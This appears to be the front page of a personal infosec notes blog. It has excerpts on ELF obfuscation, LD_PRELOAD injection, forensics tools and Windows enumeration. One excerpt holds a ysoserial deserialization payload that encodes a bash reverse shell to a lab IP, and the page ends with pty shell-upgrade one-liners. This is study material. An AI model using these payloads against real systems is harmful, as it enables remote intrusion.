akde/infosec

Information security is ultimately about managing risk


  • Simple protection A pack­er can be used to “opti­mize” / “com­press” a bina­ry which on the oth­er hand also makes it hard­er to debug. A pack­er removes une­ses­sary infor­ma­tion and the mini­fi­ca­tion can lead also to obfus­ca­tion to some extend. A stan­dard tool is UPX. Min­i­mize a bina­ry with upx -9 bin.elf. Advanced protection Obfus­ca­tion…


  • This post describes meth­ods to transform/obfuscate/minimize Lin­ux ELF files. sstrip The sec­tions are used for debug­ging and not nec­ces­sary for a pro­gram’s exe­cu­tion. The com­mand sstrip removes all sec­tions from the file. sstrip bin.elf After the com­mand, it can be ver­i­fied with readelf --sections bin.elf that there are not sec­tions are in the file.


  • Concepts A seg­ment is a piece of a infor­ma­tion which is mapped into the mem­o­ry (of a process). A ELF bina­ry can have zero or mul­ti­ple seg­ments. It defines also where the OS should put it into the mem­o­ry. Each seg­ment has a Pro­gram Head­er which describes the sec­tions within. A sec­tion is a dis­tinc­tive…


  • Overwrite functions with LD_PRELOAD The LD_PRELOAD envi­ron­ment vari­able allows to inject a library which is loaded before the pro­gram libraries. This means that it is pos­si­ble to redi­rect the exe­cu­tion flow to an inject­ed func­tion via an own library object.


  • This page col­lects tools for the Lin­ux Exe­cutable and Link­ing For­mat (ELF) with some basic commands. checksec.sh Shows which exploits mit­i­ga­tions a pro­gram has. (Source) ./checksec.sh --file file.elf GDB See the gdb post. Objdump Obj­dump shows infor­ma­tion about a bina­ry (object) file. Show the assem­ble code from a ELF file. objdump -d bin.elf Show all sym­bols (e.g.…


  • Mir­ror­ing git­tyleaks: Exe­cute with­in a local repos­i­to­ry the com­mand gittyleaks --find-anything. git-secrets: Scans (only) com­mit mes­sages for sen­si­tive infor­ma­tion with git secrets --scan-history. truf­fle­Hog: Scans repos and prints out infor­ma­tion with a high entropy: Exe­cute it with trufflehog $repo_dir. git-secret-scan­ner: Scans a repo with git-secret-scanner scan -d $git_repo. Oth­er tools


  • See also Mem­ProcFS The foren­sic mem­o­ry frame­work Volatil­i­ty (Ver­sion 3 since 2019) offers a wide range of meth­ods to analyse mem­o­ry. See the blog post Retriev­ing mem­o­ry for meth­ods and tech­niques to obtain memory. Start by get­ting gen­er­al infor­ma­tion about a mem­o­ry dump: volatility -f image.mem imageinfo Now use the fol­low­ing com­mands to get more information:…


  • Yet anoth­er ridi­colous acrynom is a tool for detect infor­ma­tion in bina­ry and text files. YARA rules are writen in text files.  By call­ing yara with a rule file and a file to test, it either returns noth­ing if no rule was detect­ed or one or mul­ti­ple rules which match­es the pro­vid­ed file. Exam­ple: The foll­wing rule…


  • Malware (Notes are tak­en from the Try­HackMe course.) John von Neu­mann (!) cre­at­ed a con­cept of mali­cious soft­ware in 1949. The first imple­men­ta­tion was done in 1971 by Bob Thomas. The pro­gram Creep­er jumped from one sys­tem (run­ning the oper­at­ing sys­tem Tenex) to anoth­er and just print­ed a mes­sage on each console. The team Nema­tode is…


  • Address­es with­in the mem­o­ry are ref­er­enced with @ General Start­ing with direct­ly analysing all ref­er­enced code. r2 -A $file ... e emu.str = true Start­ing with enabled debug­ger (only when I want to exe­cute the program) r2 -AA -e dbg.follow.child=true -e dbg.forks=true -d $file ... e emu.str = true Fork para­me­ter: If the process forks, the debug­ger halts Type…


  • IKE is used on VPN servers on UDP 500. Test a serv­er with ike-scan -M $target Exam­ple output: SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify PSK means that a pre­shared key is used. 1 returned hand­shake, 0, returned noti­fy means that…


  • What to do if all ports seemed to be closed? Open Wire­shark and mon­i­tor it dur­ing a full TCP scan Scan also all UDP ports Fil­ter in Wire­shark where the tar­get con­nect­ed back to you. Port knock­ing? Can you trig­ger the serv­er via a third-party?  Or does it change a behviour time-based?


  • Enumeration See Ora­cle article


  • If you can pro­vide a seri­al­ized (.ser) file, try to cre­ate a pay­load direct­ly, if you have the source code, or just use a yose­r­i­al payload. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "ping -c 4 192.168.49.175" > /tmp/recycler.ser // Prepare a reverse shell command line an transform it into b64. java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ5LjE3NS80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}"…


  • File and directory integrity levels C:\Users\User>icacls hallo hallo NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) WINDEV2012EVAL\User:(I)(F) Mandatory Label\High Mandatory Level:(NW) (I)(F) means that the cor­re­spond­ing user or group has (F) Full per­mis­sion on the file and that the per­mis­sions are inher­it­ed from the par­ent = directory. Note that the Read right ® also enables exe­cu­tion on that file! (There…


  • Should exploit /tmp/18650.py not work, use svwar ‑m INVITE ‑e100-500 10.10.10.7 to deter­mine the prop­er exten­sion id.


  • Pen­testers love 0days and cool exploits. “There are FAR more mis­con­fig­u­ra­tions than vulns.” “Vulns will be detect­ed and patch­es by Nes­sus, Nex­pose, etc.” “Mis­con­fig­u­ra­tions typ­i­cal­ly are missed by scanners.” “You want to increase secu­ri­ty? Go to your boss and change the job descrip­tions of admins to include con­fi­den­tial­ty and integri­ty. That mat­ters more than any­thing else.” “If you…


  • Various Show who else is logged in. qwinsta Open the Event View­er and search in the looks. Have fun! Network enumeration Show the net­work con­fig­u­ra­tion. Are there mul­ti­ple interfaces? ipconfig /all Rout­ing information route print Show cur­rent net­work con­nec­tions. After check­ing this com­mand: CHECK all ports with the pre­vi­ous found ones! netstat -ano Check the ARP cache…


  • Deter­mine if the sys­tem has the WSL with bash: where /R C:\windows bash.exe If bash.exe is there and the WSL is run­ning, then com­mands can be run as root (!) like: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.19041.423_none_1da742a41b53e164\bash.exe whoami Install the WSL To install the WSL, a sys­tem shell is required unfor­tu­natel­ly. See this arti­cle for instal­la­tion.


About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';